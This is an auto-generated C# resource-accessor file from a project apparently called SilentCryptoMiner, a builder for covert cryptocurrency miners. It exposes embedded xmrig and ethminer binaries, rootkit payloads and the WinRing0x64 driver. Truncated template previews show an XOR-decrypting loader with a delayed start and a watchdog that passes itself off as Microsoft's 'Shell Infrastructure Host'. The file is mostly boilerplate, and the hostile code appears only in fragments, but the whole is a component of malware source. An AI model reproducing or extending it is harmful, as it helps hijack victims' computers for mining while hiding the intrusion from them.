//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace SilentCryptoMiner.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    public class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SilentCryptoMiner.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        public static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] administrator {
            get {
                object obj = ResourceManager.GetObject("administrator", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using System.Reflection;
        ///using System.Security.Principal;
        ///using System.Security.Cryptography;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Resources;
        ///using System.Threading;
        ///using System.Diagnostics;
        ///using Microsoft.Win32;
        ///using System.Collections.Generic;
        ///using System.Management;
        ///#if DefDebug
        ///using System.Windows.Forms;
        ///#endif
        ///
        ///public partial class _rChecker_
        ///{
        ///    public static void Main()
        ///    {
        ///     [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Checker {
            get {
                return ResourceManager.GetString("Checker", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] Compilers {
            get {
                object obj = ResourceManager.GetObject("Compilers", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon Ethereum {
            get {
                object obj = ResourceManager.GetObject("Ethereum", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap Ethereum1 {
            get {
                object obj = ResourceManager.GetObject("Ethereum1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] ethminer {
            get {
                object obj = ResourceManager.GetObject("ethminer", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon icon {
            get {
                object obj = ResourceManager.GetObject("icon", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap icon1 {
            get {
                object obj = ResourceManager.GetObject("icon1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] Includes {
            get {
                object obj = ResourceManager.GetObject("Includes", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] libs {
            get {
                object obj = ResourceManager.GetObject("libs", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #include &lt;stdio.h&gt;
        ///#include &lt;stdlib.h&gt;
        ///#include &lt;windows.h&gt;
        ///#include &lt;sys/types.h&gt;
        ///#include &quot;Includes/syscalls.h&quot;
        ///
        ////* Created by Unam Sanctam, https://github.com/UnamSanctam */
        ///
        ///char* cipher(char* data, long dataLen) {
        ///	char* output = (char*)malloc(sizeof(char) * dataLen+1);
        ///	output[dataLen] = 0;
        ///	for (int i = 0; i &lt; dataLen; i++) {
        ///		output[i] = data[i] ^ &quot;#KEY&quot;[i % #KEYLENGTH];
        ///	}
        ///	return output;
        ///}
        ///
        ///int main(int argc, char** argv) {
        ///	Sleep(startDelay * 1000);
        ///
        ///	PROCESS_INFORMATION p_info;
        ///	STARTUPINFO s_i [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Loader {
            get {
                return ResourceManager.GetString("Loader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap microsoft_admin {
            get {
                object obj = ResourceManager.GetObject("microsoft_admin", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        /// </summary>
        public static System.Drawing.Icon Monero {
            get {
                object obj = ResourceManager.GetObject("Monero", resourceCulture);
                return ((System.Drawing.Icon)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Drawing.Bitmap.
        /// </summary>
        public static System.Drawing.Bitmap Monero1 {
            get {
                object obj = ResourceManager.GetObject("Monero1", resourceCulture);
                return ((System.Drawing.Bitmap)(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using System.Management;
        ///using System.Reflection;
        ///using System.Runtime.InteropServices;
        ///using System.Security.Cryptography;
        ///using System.Security.Principal;
        ///using System.Text;
        ///using System.Threading;
        ///using System.Windows.Forms;
        ///
        ///#if DefAssembly
        ///[assembly: AssemblyTitle(&quot;%Title%&quot;)]
        ///[assembly: AssemblyDescription(&quot;%Description%&quot;)]
        ///[assembly: AssemblyCompany(&quot;%Company%&quot;)]
        ///[assembly: AssemblyProduct(&quot;%Product% [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Program {
            get {
                return ResourceManager.GetString("Program", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to #ifdef DefIcon
        ///MAINICON ICON &quot;#ICON&quot;
        ///#endif
        ///#ifdef DefAdmin
        ///1 24 &quot;administrator.manifest&quot;
        ///#endif
        ///#ifdef DefAssembly
        ///1 VERSIONINFO
        ///FILEVERSION     #VERSION
        ///PRODUCTVERSION  #VERSION
        ///BEGIN
        ///    BLOCK &quot;StringFileInfo&quot;
        ///    BEGIN
        ///        BLOCK &quot;040904b0&quot;
        ///        BEGIN
        ///            VALUE &quot;CompanyName&quot;, &quot;#COMPANY&quot;
        ///			VALUE &quot;FileTitle&quot;, &quot;#TITLE&quot;
        ///            VALUE &quot;FileDescription&quot;, &quot;#DESCRIPTION&quot;
        ///            VALUE &quot;FileVersion&quot;, &quot;#VERSION&quot;
        ///            VALUE &quot;LegalCopyright&quot;, &quot;#COPYRIGHT&quot;
        ///			VALUE &quot; [rest of string was truncated]&quot;;.
        /// </summary>
        public static string resource {
            get {
                return ResourceManager.GetString("resource", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] rootkit_i {
            get {
                object obj = ResourceManager.GetObject("rootkit_i", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] rootkit_u {
            get {
                object obj = ResourceManager.GetObject("rootkit_u", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.IO;
        ///using System.IO.Compression;
        ///using System.Reflection;
        ///using System.Security.Principal;
        ///using System.Security.Cryptography;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Resources;
        ///using System.Threading;
        ///using System.Diagnostics;
        ///using Microsoft.Win32;
        ///using System.Collections.Generic;
        ///using System.Management;
        ///#if DefDebug
        ///using System.Windows.Forms;
        ///#endif
        ///
        ///public partial class _rUninstaller_
        ///{
        ///    public static string _rbD_ = (Envi [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Uninstaller {
            get {
                return ResourceManager.GetString("Uninstaller", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;
        ///using System.Diagnostics;
        ///using System.IO;
        ///using System.Management;
        ///using System.Reflection;
        ///using System.Security.Principal;
        ///using System.Security.Cryptography;
        ///using System.Runtime.InteropServices;
        ///using System.Text;
        ///using System.Threading;
        ///#if DefDebug
        ///using System.Windows.Forms;
        ///#endif
        ///
        ///[assembly: AssemblyTitle(&quot;Shell Infrastructure Host&quot;)]
        ///[assembly: AssemblyDescription(&quot;Shell Infrastructure Host&quot;)]
        ///[assembly: AssemblyProduct(&quot;Microsoft® Windows® Operating System&quot;)]
        ///[asse [rest of string was truncated]&quot;;.
        /// </summary>
        public static string Watchdog {
            get {
                return ResourceManager.GetString("Watchdog", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] WinRing0x64 {
            get {
                object obj = ResourceManager.GetObject("WinRing0x64", resourceCulture);
                return ((byte[])(obj));
            }
        }
        
        /// <summary>
        ///   Looks up a localized resource of type System.Byte[].
        /// </summary>
        public static byte[] xmrig {
            get {
                object obj = ResourceManager.GetObject("xmrig", resourceCulture);
                return ((byte[])(obj));
            }
        }
    }
}
